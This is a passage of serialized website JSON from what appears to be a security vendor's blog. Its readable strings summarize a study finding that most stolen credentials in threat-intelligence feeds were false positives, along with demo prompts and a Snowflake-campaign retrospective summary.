credentials",[176068],{"type":370},{},{"nodeType":173,"value":176071,"marks":176072,"data":176073}," included in threat intelligence feeds from a multi-vendor data set was actionable.",[],{},"TI feed insight block",{"sys":176076,"__typename":5345,"title":176077,"caption":176077,"layoutMode":118,"file":176078},{"id":155048},"Picture is for advertising purposes only. Push customers will not receive a 30-ton TI trommel wash plant.",{"url":176079,"width":137047,"height":123328},"https://images.ctfassets.net/y1cdw1ablpvd/3YA8FHrChrqMZyN14tURQI/052ead85b614f12ebc9afa7a3fa543fe/image2.png",{"sys":176081,"__typename":5311,"content":176082,"name":176104,"title":118},{"id":155139},{"json":176083},{"data":176084,"content":176085,"nodeType":165},{},[176086,176098],{"data":176087,"content":176088,"nodeType":178},{},[176089,176093],{"data":176090,"marks":176091,"value":176092,"nodeType":173},{},[],"In evaluating threat intelligence data recently at Push, our researchers analyzed 5,763 username and password combinations that matched domains in use by Push customers. We found that less than 1% of the credentials in the multi-vendor dataset were true positives — meaning that the suspected stolen credentials were still in use by employees at those organizations. ",{"data":176094,"marks":176095,"value":176097,"nodeType":173},{},[176096],{"type":370},"In other words, 99.5% of the stolen credentials we checked were false positives at the time of review.",{"data":176099,"content":176100,"nodeType":178},{},[176101],{"data":176102,"marks":176103,"value":13836,"nodeType":173},{},[],"TI feed insight box 2",{"sys":176106,"__typename":15269,"type":112637,"ctaText":176107,"buttonLabel":176108,"buttonColour":152046,"buttonUrl":473},{"id":155474},"Get a demo of verified stolen credential detection and more","Book Demo",{"sys":176110,"__typename":5345,"title":176111,"caption":176112,"layoutMode":118,"file":176113},{"id":155494},"Stolen credentials TI graphic","How Push verifies stolen credentials from TI sources",{"url":176114,"width":176115,"height":137037},"https://images.ctfassets.net/y1cdw1ablpvd/1D5QMZSOHWL20J7ooV2Mqt/bd89638611257c8540259d4b03ac9863/Stolen_credentials_data_flow_illustration.png",7680,{"sys":176117,"__typename":15269,"type":112637,"ctaText":176118,"buttonLabel":176108,"buttonColour":15273,"buttonUrl":1469},{"id":4766},"Book a demo to see how Push helps you detect and prevent account takeover and reduce your identity attack surface","content:blog:verified-stolen-credential-detection.json","blog/verified-stolen-credential-detection.json","blog/verified-stolen-credential-detection",{"_path":176123,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":176124,"ogImage":118,"summary":176126,"title":4774,"subtitle":118,"metaTitle":4774,"synopsis":4775,"hashTags":118,"publishedDate":4776,"slug":4777,"tagsCollection":176137,"relatedBlogPostsCollection":176141,"authorsCollection":178480,"content":178484,"_id":179228,"_type":5439,"_source":5440,"_file":179229,"_stem":179230,"_extension":5439},"/blog/snowflake-retro",{"id":3979,"publishedAt":176125},"2026-04-08T15:56:21.318Z",{"json":176127},{"data":176128,"content":176129,"nodeType":165},{},[176130],{"data":176131,"content":176132,"nodeType":178},{},[176133],{"data":176134,"marks":176135,"value":176136,"nodeType":173},{},[],"The campaign against Snowflake customers in 2024 was a watershed moment for the cyber security industry, indicating that we’ve entered a new era of cyber security in which identity is the new perimeter.",{"items":176138},[176139],{"sys":176140,"name":505},{"id":504},{"items":176142},[176143,176757,177750],{"__typename":1528,"sys":176144,"content":176145,"title":46310,"synopsis":155637,"hashTags":118,"publishedDate":155638,"slug":46311,"tagsCollection":176747,"authorsCollection":176753},{"id":24713},{"json":176146},{"nodeType":165,"data":176147,"content":176148},{},[176149,176154,176157,176170,176176,176182,176187,176193,176209,176224,176230,176235,176241,176244,176250,176256,176262,176268,176274,176280,176309,176314,176320,176323,176329,176335,176433,176439,176455,176461,176477,176483,176500,176506,176522,176525,176531,176537,176543,176569,176575,176581,176596,176601,176607,176613,176618,176624,176681,176687,176693,176699,176705,176711,176714,176720,176736,176741],{"nodeType":312,"data":176150,"content":176153},{"target":176151},{"sys":176152},{"id":154952,"type":317,"linkType":318},[],{"nodeType":231,"data":176155,"content":176156},{},[],{"nodeType":178,"data":176158,"content":176159},{},[176160,176163,176167],{"nodeType":173,"value":154961,"marks":176161,"data":176162},[],{},{"nodeType":173,"value":154965,"marks":176164,"data":176166},[176165],{"type":1646},{},{"nodeType":173,"value":154970,"marks":176168,"data":176169},[],{},{"nodeType":178,"data":176171,"content":176172},{},[176173],{"nodeType":173,"value":154977,"marks":176174,"data":176175},[],{},{"nodeType":178,"data":176177,"content":176178},{},[176179],{"nodeType":173,"value":154984,"marks":176180,"data":176181},[],{},{"nodeType":312,"data":176183,"content":176186},{"target":176184},{"sys":176185},{"id":154991,"type":317,"linkType":318},[],{"nodeType":178,"data":176188,"content":176189},{},[176190],{"nodeType":173,"value":154997,"marks":176191,"data":176192},[],{},{"nodeType":3769,"data":176194,"content":176195},{},[176196],{"nodeType":178,"data":176197,"content":176198},{},[176199,176202,176206],{"nodeType":173,"value":155007,"marks":176200,"data":176201},[],{},{"nodeType":173,"value":155011,"marks":176203,"data":176205},[176204],{"type":370},{},{"nodeType":173,"value":2340,"marks":176207,"data":176208},[],{},{"nodeType":178,"data":176210,"content":176211},{},[176212,176215,176221],{"nodeType":173,"value":155022,"marks":176213,"data":176214},[],{},{"nodeType":186,"data":176216,"content":176217},{"uri":155027},[176218],{"nodeType":173,"value":155030,"marks":176219,"data":176220},[],{},{"nodeType":173,"value":155034,"marks":176222,"data":176223},[],{},{"nodeType":178,"data":176225,"content":176226},{},[176227],{"nodeType":173,"value":155041,"marks":176228,"data":176229},[],{},{"nodeType":312,"data":176231,"content":176234},{"target":176232},{"sys":176233},{"id":155048,"type":317,"linkType":318},[],{"nodeType":178,"data":176236,"content":176237},{},[176238],{"nodeType":173,"value":155054,"marks":176239,"data":176240},[],{},{"nodeType":231,"data":176242,"content":176243},{},[],{"nodeType":169,"data":176245,"content":176246},{},[176247],{"nodeType":173,"value":155064,"marks":176248,"data":176249},[],{},{"nodeType":178,"data":176251,"content":176252},{},[176253],{"nodeType":173,"value":155071,"marks":176254,"data":176255},[],{},{"nodeType":178,"data":176257,"content":176258},{},[176259],{"nodeType":173,"value":155078,"marks":176260,"data":176261},[],{},{"nodeType":235,"data":176263,"content":176264},{},[176265],{"nodeType":173,"value":155085,"marks":176266,"data":176267},[],{},{"nodeType":178,"data":176269,"content":176270},{},[176271],{"nodeType":173,"value":155092,"marks":176272,"data":176273},[],{},{"nodeType":178,"data":176275,"content":176276},{},[176277],{"nodeType":173,"value":155099,"marks":176278,"data":176279},[],{},{"nodeType":250,"data":176281,"content":176282},{},[176283,176296],{"nodeType":254,"data":176284,"content":176285},{},[176286],{"nodeType":178,"data":176287,"content":176288},{},[176289,176293],{"nodeType":173,"value":155112,"marks":176290,"data":176292},[176291],{"type":370},{},{"nodeType":173,"value":155117,"marks":176294,"data":176295},[],{},{"nodeType":254,"data":176297,"content":176298},{},[176299],{"nodeType":178,"data":176300,"content":176301},{},[176302,176306],{"nodeType":173,"value":155127,"marks":176303,"data":176305},[176304],{"type":370},{},{"nodeType":173,"value":155132,"marks":176307,"data":176308},[],{},{"nodeType":312,"data":176310,"content":176313},{"target":176311},{"sys":176312},{"id":155139,"type":317,"linkType":318},[],{"nodeType":178,"data":176315,"content":176316},{},[176317],{"nodeType":173,"value":155145,"marks":176318,"data":176319},[],{},{"nodeType":231,"data":176321,"content":176322},{},[],{"nodeType":169,"data":176324,"content":176325},{},[176326],{"nodeType":173,"value":155155,"marks":176327,"data":176328},[],{},{"nodeType":178,"data":176330,"content":176331},{},[176332],{"nodeType":173,"value":155162,"marks":176333,"data":176334},[],{},{"nodeType":250,"data":176336,"content":176337},{},[176338,176357,176376,176395,176424],{"nodeType":254,"data":176339,"content":176340},{},[176341],{"nodeType":178,"data":176342,"content":176343},{},[176344,176347,176354],{"nodeType":173,"value":5039,"marks":176345,"data":176346},[],{},{"nodeType":186,"data":176348,"content":176349},{"uri":125982},[176350],{"nodeType":173,"value":155181,"marks":176351,"data":176353},[176352],{"type":194},{},{"nodeType":173,"value":155186,"marks":176355,"data":176356},[],{},{"nodeType":254,"data":176358,"content":176359},{},[176360],{"nodeType":178,"data":176361,"content":176362},{},[176363,176366,176373],{"nodeType":173,"value":37,"marks":176364,"data":176365},[],{},{"nodeType":186,"data":176367,"content":176368},{"uri":155200},[176369],{"nodeType":173,"value":155203,"marks":176370,"data":176372},[176371],{"type":194},{},{"nodeType":173,"value":155208,"marks":176374,"data":176375},[],{},{"nodeType":254,"data":176377,"content":176378},{},[176379],{"nodeType":178,"data":176380,"content":176381},{},[176382,176385,176392],{"nodeType":173,"value":155218,"marks":176383,"data":176384},[],{},{"nodeType":186,"data":176386,"content":176387},{"uri":155223},[176388],{"nodeType":173,"value":155226,"marks":176389,"data":176391},[176390],{"type":194},{},{"nodeType":173,"value":155231,"marks":176393,"data":176394},[],{},{"nodeType":254,"data":176396,"content":176397},{},[176398],{"nodeType":178,"data":176399,"content":176400},{},[176401,176404,176411,176414,176421],{"nodeType":173,"value":155241,"marks":176402,"data":176403},[],{},{"nodeType":186,"data":176405,"content":176406},{"uri":155246},[176407],{"nodeType":173,"value":155249,"marks":176408,"data":176410},[176409],{"type":194},{},{"nodeType":173,"value":155254,"marks":176412,"data":176413},[],{},{"nodeType":186,"data":176415,"content":176416},{"uri":155259},[176417],{"nodeType":173,"value":155262,"marks":176418,"data":176420},[176419],{"type":194},{},{"nodeType":173,"value":155267,"marks":176422,"data":176423},[],{},{"nodeType":254,"data":176425,"content":176426},{},[176427],{"nodeType":178,"data":176428,"content":176429},{},[176430],{"nodeType":173,"value":155277,"marks":176431,"data":176432},[],{},{"nodeType":178,"data":176434,"content":176435},{},[176436],{"nodeType":173,"value":155284,"marks":176437,"data":176438},[],{},{"nodeType":178,"data":176440,"content":176441},{},[176442,176445,176452],{"nodeType":173,"value":37,"marks":176443,"data":176444},[],{},{"nodeType":186,"data":176446,"content":176447},{"uri":155200},[176448],{"nodeType":173,"value":155297,"marks":176449,"data":176451},[176450],{"type":194},{},{"nodeType":173,"value":155302,"marks":176453,"data":176454},[],{},{"nodeType":235,"data":176456,"content":176457},{},[176458],{"nodeType":173,"value":155309,"marks":176459,"data":176460},[],{},{"nodeType":178,"data":176462,"content":176463},{},[176464,176467,176474],{"nodeType":173,"value":155316,"marks":176465,"data":176466},[],{},{"nodeType":186,"data":176468,"content":176469},{"uri":126102},[176470],{"nodeType":173,"value":155323,"marks":176471,"data":176473},[176472],{"type":194},{},{"nodeType":173,"value":1477,"marks":176475,"data":176476},[],{},{"nodeType":178,"data":176478,"content":176479},{},[176480],{"nodeType":173,"value":155334,"marks":176481,"data":176482},[],{},{"nodeType":178,"data":176484,"content":176485},{},[176486,176489,176497],{"nodeType":173,"value":155341,"marks":176487,"data":176488},[],{},{"nodeType":186,"data":176490,"content":176491},{"uri":81621},[176492],{"nodeType":173,"value":155348,"marks":176493,"data":176496},[176494,176495],{"type":194},{"type":370},{},{"nodeType":173,"value":155354,"marks":176498,"data":176499},[],{},{"nodeType":178,"data":176501,"content":176502},{},[176503],{"nodeType":173,"value":155361,"marks":176504,"data":176505},[],{},{"nodeType":178,"data":176507,"content":176508},{},[176509,176512,176519],{"nodeType":173,"value":155368,"marks":176510,"data":176511},[],{},{"nodeType":186,"data":176513,"content":176514},{"uri":4492},[176515],{"nodeType":173,"value":111468,"marks":176516,"data":176518},[176517],{"type":194},{},{"nodeType":173,"value":155379,"marks":176520,"data":176521},[],{},{"nodeType":231,"data":176523,"content":176524},{},[],{"nodeType":169,"data":176526,"content":176527},{},[176528],{"nodeType":173,"value":155389,"marks":176529,"data":176530},[],{},{"nodeType":178,"data":176532,"content":176533},{},[176534],{"nodeType":173,"value":155396,"marks":176535,"data":176536},[],{},{"nodeType":178,"data":176538,"content":176539},{},[176540],{"nodeType":173,"value":155403,"marks":176541,"data":176542},[],{},{"nodeType":178,"data":176544,"content":176545},{},[176546,176549,176556,176559,176566],{"nodeType":173,"value":155410,"marks":176547,"data":176548},[],{},{"nodeType":186,"data":176550,"content":176551},{"uri":155415},[176552],{"nodeType":173,"value":155418,"marks":176553,"data":176555},[176554],{"type":194},{},{"nodeType":173,"value":155423,"marks":176557,"data":176558},[],{},{"nodeType":186,"data":176560,"content":176561},{"uri":111913},[176562],{"nodeType":173,"value":155430,"marks":176563,"data":176565},[176564],{"type":194},{},{"nodeType":173,"value":155435,"marks":176567,"data":176568},[],{},{"nodeType":178,"data":176570,"content":176571},{},[176572],{"nodeType":173,"value":155442,"marks":176573,"data":176574},[],{},{"nodeType":178,"data":176576,"content":176577},{},[176578],{"nodeType":173,"value":155449,"marks":176579,"data":176580},[],{},{"nodeType":178,"data":176582,"content":176583},{},[176584,176587,176593],{"nodeType":173,"value":155456,"marks":176585,"data":176586},[],{},{"nodeType":186,"data":176588,"content":176589},{"uri":819},[176590],{"nodeType":173,"value":155463,"marks":176591,"data":176592},[],{},{"nodeType":173,"value":155467,"marks":176594,"data":176595},[],{},{"nodeType":312,"data":176597,"content":176600},{"target":176598},{"sys":176599},{"id":155474,"type":317,"linkType":318},[],{"nodeType":235,"data":176602,"content":176603},{},[176604],{"nodeType":173,"value":155480,"marks":176605,"data":176606},[],{},{"nodeType":178,"data":176608,"content":176609},{},[176610],{"nodeType":173,"value":155487,"marks":176611,"data":176612},[],{},{"nodeType":312,"data":176614,"content":176617},{"target":176615},{"sys":176616},{"id":155494,"type":317,"linkType":318},[],{"nodeType":178,"data":176619,"content":176620},{},[176621],{"nodeType":173,"value":100610,"marks":176622,"data":176623},[],{},{"nodeType":250,"data":176625,"content":176626},{},[176627,176645,176654,176663,176672],{"nodeType":254,"data":176628,"content":176629},{},[176630],{"nodeType":178,"data":176631,"content":176632},{},[176633,176636,176642],{"nodeType":173,"value":155512,"marks":176634,"data":176635},[],{},{"nodeType":186,"data":176637,"content":176638},{"uri":155517},[176639],{"nodeType":173,"value":155030,"marks":176640,"data":176641},[],{},{"nodeType":173,"value":2340,"marks":176643,"data":176644},[],{},{"nodeType":254,"data":176646,"content":176647},{},[176648],{"nodeType":178,"data":176649,"content":176650},{},[176651],{"nodeType":173,"value":155532,"marks":176652,"data":176653},[],{},{"nodeType":254,"data":176655,"content":176656},{},[176657],{"nodeType":178,"data":176658,"content":176659},{},[176660],{"nodeType":173,"value":155542,"marks":176661,"data":176662},[],{},{"nodeType":254,"data":176664,"content":176665},{},[176666],{"nodeType":178,"data":176667,"content":176668},{},[176669],{"nodeType":173,"value":155552,"marks":176670,"data":176671},[],{},{"nodeType":254,"data":176673,"content":176674},{},[176675],{"nodeType":178,"data":176676,"content":176677},{},[176678],{"nodeType":173,"value":105070,"marks":176679,"data":176680},[],{},{"nodeType":178,"data":176682,"content":176683},{},[176684],{"nodeType":173,"value":155568,"marks":176685,"data":176686},[],{},{"nodeType":178,"data":176688,"content":176689},{},[176690],{"nodeType":173,"value":155575,"marks":176691,"data":176692},[],{},{"nodeType":235,"data":176694,"content":176695},{},[176696],{"nodeType":173,"value":155582,"marks":176697,"data":176698},[],{},{"nodeType":178,"data":176700,"content":176701},{},[176702],{"nodeType":173,"value":155589,"marks":176703,"data":176704},[],{},{"nodeType":178,"data":176706,"content":176707},{},[176708],{"nodeType":173,"value":155596,"marks":176709,"data":176710},[],{},{"nodeType":231,"data":176712,"content":176713},{},[],{"nodeType":169,"data":176715,"content":176716},{},[176717],{"nodeType":173,"value":155606,"marks":176718,"data":176719},[],{},{"nodeType":178,"data":176721,"content":176722},{},[176723,176726,176733],{"nodeType":173,"value":155613,"marks":176724,"data":176725},[],{},{"nodeType":186,"data":176727,"content":176728},{"uri":473},[176729],{"nodeType":173,"value":71815,"marks":176730,"data":176732},[176731],{"type":194},{},{"nodeType":173,"value":197,"marks":176734,"data":176735},[],{},{"nodeType":312,"data":176737,"content":176740},{"target":176738},{"sys":176739},{"id":4766,"type":317,"linkType":318},[],{"nodeType":178,"data":176742,"content":176743},{},[176744],{"nodeType":173,"value":37,"marks":176745,"data":176746},[],{},{"items":176748},[176749,176751],{"sys":176750,"name":18399},{"id":18398},{"sys":176752,"name":509},{"id":508},{"items":176754},[176755],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":176756},{"url":2911},{"__typename":1528,"sys":176758,"content":176759,"title":168014,"synopsis":175419,"hashTags":118,"publishedDate":175420,"slug":168015,"tagsCollection":177740,"authorsCollection":177746},{"id":148636},{"json":176760},{"nodeType":165,"data":176761,"content":176762},{},[176763,176789,176799,176812,176818,176824,176827,176833,176839,176955,176961,176967,177043,177049,177055,177103,177109,177130,177176,177179,177185,177201,177217,177223,177239,177245,177255,177258,177264,177270,177312,177318,177324,177340,177343,177349,177355,177361,177377,177383,177389,177395,177411,177417,177423,177429,177435,177451,177457,177463,177469,177475,177500,177505,177508,177514,177520,177525,177531,177537,177558,177564,177570,177609,177622,177638,177643,177649,177655,177661,177687,177723,177729,177734],{"nodeType":178,"data":176764,"content":176765},{},[176766,176769,176776,176779,176786],{"nodeType":173,"value":174290,"marks":176767,"data":176768},[],{},{"nodeType":186,"data":176770,"content":176771},{"uri":3999},[176772],{"nodeType":173,"value":174297,"marks":176773,"data":176775},[176774],{"type":194},{},{"nodeType":173,"value":174302,"marks":176777,"data":176778},[],{},{"nodeType":186,"data":176780,"content":176781},{"uri":74621},[176782],{"nodeType":173,"value":74624,"marks":176783,"data":176785},[176784],{"type":194},{},{"nodeType":173,"value":174313,"marks":176787,"data":176788},[],{},{"nodeType":178,"data":176790,"content":176791},{},[176792,176795],{"nodeType":173,"value":174320,"marks":176793,"data":176794},[],{},{"nodeType":173,"value":174324,"marks":176796,"data":176798},[176797],{"type":370},{},{"nodeType":178,"data":176800,"content":176801},{},[176802,176805,176809],{"nodeType":173,"value":174332,"marks":176803,"data":176804},[],{},{"nodeType":173,"value":174336,"marks":176806,"data":176808},[176807],{"type":370},{},{"nodeType":173,"value":174341,"marks":176810,"data":176811},[],{},{"nodeType":178,"data":176813,"content":176814},{},[176815],{"nodeType":173,"value":174348,"marks":176816,"data":176817},[],{},{"nodeType":178,"data":176819,"content":176820},{},[176821],{"nodeType":173,"value":174355,"marks":176822,"data":176823},[],{},{"nodeType":231,"data":176825,"content":176826},{},[],{"nodeType":169,"data":176828,"content":176829},{},[176830],{"nodeType":173,"value":174365,"marks":176831,"data":176832},[],{},{"nodeType":178,"data":176834,"content":176835},{},[176836],{"nodeType":173,"value":174372,"marks":176837,"data":176838},[],{},{"nodeType":250,"data":176840,"content":176841},{},[176842,176861,176880,176899,176918,176936],{"nodeType":254,"data":176843,"content":176844},{},[176845],{"nodeType":178,"data":176846,"content":176847},{},[176848,176851,176858],{"nodeType":173,"value":174385,"marks":176849,"data":176850},[],{},{"nodeType":186,"data":176852,"content":176853},{"uri":174390},[176854],{"nodeType":173,"value":174393,"marks":176855,"data":176857},[176856],{"type":194},{},{"nodeType":173,"value":53584,"marks":176859,"data":176860},[],{},{"nodeType":254,"data":176862,"content":176863},{},[176864],{"nodeType":178,"data":176865,"content":176866},{},[176867,176870,176877],{"nodeType":173,"value":150381,"marks":176868,"data":176869},[],{},{"nodeType":186,"data":176871,"content":176872},{"uri":150386},[176873],{"nodeType":173,"value":150389,"marks":176874,"data":176876},[176875],{"type":194},{},{"nodeType":173,"value":53584,"marks":176878,"data":176879},[],{},{"nodeType":254,"data":176881,"content":176882},{},[176883],{"nodeType":178,"data":176884,"content":176885},{},[176886,176889,176896],{"nodeType":173,"value":174426,"marks":176887,"data":176888},[],{},{"nodeType":186,"data":176890,"content":176891},{"uri":174431},[176892],{"nodeType":173,"value":1255,"marks":176893,"data":176895},[176894],{"type":194},{},{"nodeType":173,"value":60235,"marks":176897,"data":176898},[],{},{"nodeType":254,"data":176900,"content":176901},{},[176902],{"nodeType":178,"data":176903,"content":176904},{},[176905,176908,176915],{"nodeType":173,"value":174447,"marks":176906,"data":176907},[],{},{"nodeType":186,"data":176909,"content":176910},{"uri":125982},[176911],{"nodeType":173,"value":1300,"marks":176912,"data":176914},[176913],{"type":194},{},{"nodeType":173,"value":53584,"marks":176916,"data":176917},[],{},{"nodeType":254,"data":176919,"content":176920},{},[176921],{"nodeType":178,"data":176922,"content":176923},{},[176924,176927,176933],{"nodeType":173,"value":174467,"marks":176925,"data":176926},[],{},{"nodeType":186,"data":176928,"content":176929},{"uri":150408},[176930],{"nodeType":173,"value":150411,"marks":176931,"data":176932},[],{},{"nodeType":173,"value":53584,"marks":176934,"data":176935},[],{},{"nodeType":254,"data":176937,"content":176938},{},[176939],{"nodeType":178,"data":176940,"content":176941},{},[176942,176945,176952],{"nodeType":173,"value":174486,"marks":176943,"data":176944},[],{},{"nodeType":186,"data":176946,"content":176947},{"uri":150450},[176948],{"nodeType":173,"value":96495,"marks":176949,"data":176951},[176950],{"type":194},{},{"nodeType":173,"value":53584,"marks":176953,"data":176954},[],{},{"nodeType":235,"data":176956,"content":176957},{},[176958],{"nodeType":173,"value":174503,"marks":176959,"data":176960},[],{},{"nodeType":178,"data":176962,"content":176963},{},[176964],{"nodeType":173,"value":174510,"marks":176965,"data":176966},[],{},{"nodeType":178,"data":176968,"content":176969},{},[176970,176973,176980,176983,176990,176993,177000,177003,177010,177013,177020,177023,177030,177033,177040],{"nodeType":173,"value":174517,"marks":176971,"data":176972},[],{},{"nodeType":186,"data":176974,"content":176975},{"uri":174522},[176976],{"nodeType":173,"value":174525,"marks":176977,"data":176979},[176978],{"type":194},{},{"nodeType":173,"value":174530,"marks":176981,"data":176982},[],{},{"nodeType":186,"data":176984,"content":176985},{"uri":174535},[176986],{"nodeType":173,"value":174538,"marks":176987,"data":176989},[176988],{"type":194},{},{"nodeType":173,"value":174543,"marks":176991,"data":176992},[],{},{"nodeType":186,"data":176994,"content":176995},{"uri":174548},[176996],{"nodeType":173,"value":174551,"marks":176997,"data":176999},[176998],{"type":194},{},{"nodeType":173,"value":2936,"marks":177001,"data":177002},[],{},{"nodeType":186,"data":177004,"content":177005},{"uri":174560},[177006],{"nodeType":173,"value":174563,"marks":177007,"data":177009},[177008],{"type":194},{},{"nodeType":173,"value":2936,"marks":177011,"data":177012},[],{},{"nodeType":186,"data":177014,"content":177015},{"uri":174572},[177016],{"nodeType":173,"value":174575,"marks":177017,"data":177019},[177018],{"type":194},{},{"nodeType":173,"value":2936,"marks":177021,"data":177022},[],{},{"nodeType":186,"data":177024,"content":177025},{"uri":174584},[177026],{"nodeType":173,"value":174587,"marks":177027,"data":177029},[177028],{"type":194},{},{"nodeType":173,"value":9534,"marks":177031,"data":177032},[],{},{"nodeType":186,"data":177034,"content":177035},{"uri":174596},[177036],{"nodeType":173,"value":174599,"marks":177037,"data":177039},[177038],{"type":194},{},{"nodeType":173,"value":174604,"marks":177041,"data":177042},[],{},{"nodeType":178,"data":177044,"content":177045},{},[177046],{"nodeType":173,"value":174611,"marks":177047,"data":177048},[],{},{"nodeType":178,"data":177050,"content":177051},{},[177052],{"nodeType":173,"value":174618,"marks":177053,"data":177054},[],{},{"nodeType":250,"data":177056,"content":177057},{},[177058,177067,177076,177085,177094],{"nodeType":254,"data":177059,"content":177060},{},[177061],{"nodeType":178,"data":177062,"content":177063},{},[177064],{"nodeType":173,"value":174631,"marks":177065,"data":177066},[],{},{"nodeType":254,"data":177068,"content":177069},{},[177070],{"nodeType":178,"data":177071,"content":177072},{},[177073],{"nodeType":173,"value":174641,"marks":177074,"data":177075},[],{},{"nodeType":254,"data":177077,"content":177078},{},[177079],{"nodeType":178,"data":177080,"content":177081},{},[177082],{"nodeType":173,"value":174651,"marks":177083,"data":177084},[],{},{"nodeType":254,"data":177086,"content":177087},{},[177088],{"nodeType":178,"data":177089,"content":177090},{},[177091],{"nodeType":173,"value":174661,"marks":177092,"data":177093},[],{},{"nodeType":254,"data":177095,"content":177096},{},[177097],{"nodeType":178,"data":177098,"content":177099},{},[177100],{"nodeType":173,"value":174671,"marks":177101,"data":177102},[],{},{"nodeType":178,"data":177104,"content":177105},{},[177106],{"nodeType":173,"value":174678,"marks":177107,"data":177108},[],{},{"nodeType":250,"data":177110,"content":177111},{},[177112,177121],{"nodeType":254,"data":177113,"content":177114},{},[177115],{"nodeType":178,"data":177116,"content":177117},{},[177118],{"nodeType":173,"value":174691,"marks":177119,"data":177120},[],{},{"nodeType":254,"data":177122,"content":177123},{},[177124],{"nodeType":178,"data":177125,"content":177126},{},[177127],{"nodeType":173,"value":174701,"marks":177128,"data":177129},[],{},{"nodeType":178,"data":177131,"content":177132},{},[177133,177136,177143,177146,177153,177156,177163,177166,177173],{"nodeType":173,"value":174708,"marks":177134,"data":177135},[],{},{"nodeType":186,"data":177137,"content":177138},{"uri":174713},[177139],{"nodeType":173,"value":174716,"marks":177140,"data":177142},[177141],{"type":194},{},{"nodeType":173,"value":2936,"marks":177144,"data":177145},[],{},{"nodeType":186,"data":177147,"content":177148},{"uri":174725},[177149],{"nodeType":173,"value":174728,"marks":177150,"data":177152},[177151],{"type":194},{},{"nodeType":173,"value":9534,"marks":177154,"data":177155},[],{},{"nodeType":186,"data":177157,"content":177158},{"uri":174737},[177159],{"nodeType":173,"value":174740,"marks":177160,"data":177162},[177161],{"type":194},{},{"nodeType":173,"value":174745,"marks":177164,"data":177165},[],{},{"nodeType":186,"data":177167,"content":177168},{"uri":174750},[177169],{"nodeType":173,"value":174753,"marks":177170,"data":177172},[177171],{"type":194},{},{"nodeType":173,"value":174758,"marks":177174,"data":177175},[],{},{"nodeType":231,"data":177177,"content":177178},{},[],{"nodeType":169,"data":177180,"content":177181},{},[177182],{"nodeType":173,"value":174768,"marks":177183,"data":177184},[],{},{"nodeType":178,"data":177186,"content":177187},{},[177188,177191,177198],{"nodeType":173,"value":174775,"marks":177189,"data":177190},[],{},{"nodeType":186,"data":177192,"content":177193},{"uri":174390},[177194],{"nodeType":173,"value":174782,"marks":177195,"data":177197},[177196],{"type":194},{},{"nodeType":173,"value":174787,"marks":177199,"data":177200},[],{},{"nodeType":178,"data":177202,"content":177203},{},[177204,177207,177214],{"nodeType":173,"value":174794,"marks":177205,"data":177206},[],{},{"nodeType":186,"data":177208,"content":177209},{"uri":174799},[177210],{"nodeType":173,"value":174802,"marks":177211,"data":177213},[177212],{"type":194},{},{"nodeType":173,"value":174807,"marks":177215,"data":177216},[],{},{"nodeType":178,"data":177218,"content":177219},{},[177220],{"nodeType":173,"value":174814,"marks":177221,"data":177222},[],{},{"nodeType":178,"data":177224,"content":177225},{},[177226,177229,177236],{"nodeType":173,"value":37,"marks":177227,"data":177228},[],{},{"nodeType":186,"data":177230,"content":177231},{"uri":174825},[177232],{"nodeType":173,"value":174828,"marks":177233,"data":177235},[177234],{"type":194},{},{"nodeType":173,"value":174833,"marks":177237,"data":177238},[],{},{"nodeType":178,"data":177240,"content":177241},{},[177242],{"nodeType":173,"value":174840,"marks":177243,"data":177244},[],{},{"nodeType":178,"data":177246,"content":177247},{},[177248,177252],{"nodeType":173,"value":174847,"marks":177249,"data":177251},[177250],{"type":370},{},{"nodeType":173,"value":174852,"marks":177253,"data":177254},[],{},{"nodeType":231,"data":177256,"content":177257},{},[],{"nodeType":169,"data":177259,"content":177260},{},[177261],{"nodeType":173,"value":174862,"marks":177262,"data":177263},[],{},{"nodeType":178,"data":177265,"content":177266},{},[177267],{"nodeType":173,"value":174869,"marks":177268,"data":177269},[],{},{"nodeType":250,"data":177271,"content":177272},{},[177273,177286,177299],{"nodeType":254,"data":177274,"content":177275},{},[177276],{"nodeType":178,"data":177277,"content":177278},{},[177279,177283],{"nodeType":173,"value":174882,"marks":177280,"data":177282},[177281],{"type":370},{},{"nodeType":173,"value":174887,"marks":177284,"data":177285},[],{},{"nodeType":254,"data":177287,"content":177288},{},[177289],{"nodeType":178,"data":177290,"content":177291},{},[177292,177296],{"nodeType":173,"value":174897,"marks":177293,"data":177295},[177294],{"type":370},{},{"nodeType":173,"value":174902,"marks":177297,"data":177298},[],{},{"nodeType":254,"data":177300,"content":177301},{},[177302],{"nodeType":178,"data":177303,"content":177304},{},[177305,177309],{"nodeType":173,"value":174912,"marks":177306,"data":177308},[177307],{"type":370},{},{"nodeType":173,"value":174917,"marks":177310,"data":177311},[],{},{"nodeType":178,"data":177313,"content":177314},{},[177315],{"nodeType":173,"value":174924,"marks":177316,"data":177317},[],{},{"nodeType":178,"data":177319,"content":177320},{},[177321],{"nodeType":173,"value":174931,"marks":177322,"data":177323},[],{},{"nodeType":178,"data":177325,"content":177326},{},[177327,177330,177337],{"nodeType":173,"value":174938,"marks":177328,"data":177329},[],{},{"nodeType":186,"data":177331,"content":177332},{"uri":4342},[177333],{"nodeType":173,"value":835,"marks":177334,"data":177336},[177335],{"type":194},{},{"nodeType":173,"value":174949,"marks":177338,"data":177339},[],{},{"nodeType":231,"data":177341,"content":177342},{},[],{"nodeType":169,"data":177344,"content":177345},{},[177346],{"nodeType":173,"value":174959,"marks":177347,"data":177348},[],{},{"nodeType":178,"data":177350,"content":177351},{},[177352],{"nodeType":173,"value":174966,"marks":177353,"data":177354},[],{},{"nodeType":235,"data":177356,"content":177357},{},[177358],{"nodeType":173,"value":174973,"marks":177359,"data":177360},[],{},{"nodeType":178,"data":177362,"content":177363},{},[177364,177367,177374],{"nodeType":173,"value":174980,"marks":177365,"data":177366},[],{},{"nodeType":186,"data":177368,"content":177369},{"uri":174985},[177370],{"nodeType":173,"value":174988,"marks":177371,"data":177373},[177372],{"type":194},{},{"nodeType":173,"value":1477,"marks":177375,"data":177376},[],{},{"nodeType":178,"data":177378,"content":177379},{},[177380],{"nodeType":173,"value":174999,"marks":177381,"data":177382},[],{},{"nodeType":235,"data":177384,"content":177385},{},[177386],{"nodeType":173,"value":175006,"marks":177387,"data":177388},[],{},{"nodeType":178,"data":177390,"content":177391},{},[177392],{"nodeType":173,"value":175013,"marks":177393,"data":177394},[],{},{"nodeType":178,"data":177396,"content":177397},{},[177398,177401,177408],{"nodeType":173,"value":175020,"marks":177399,"data":1774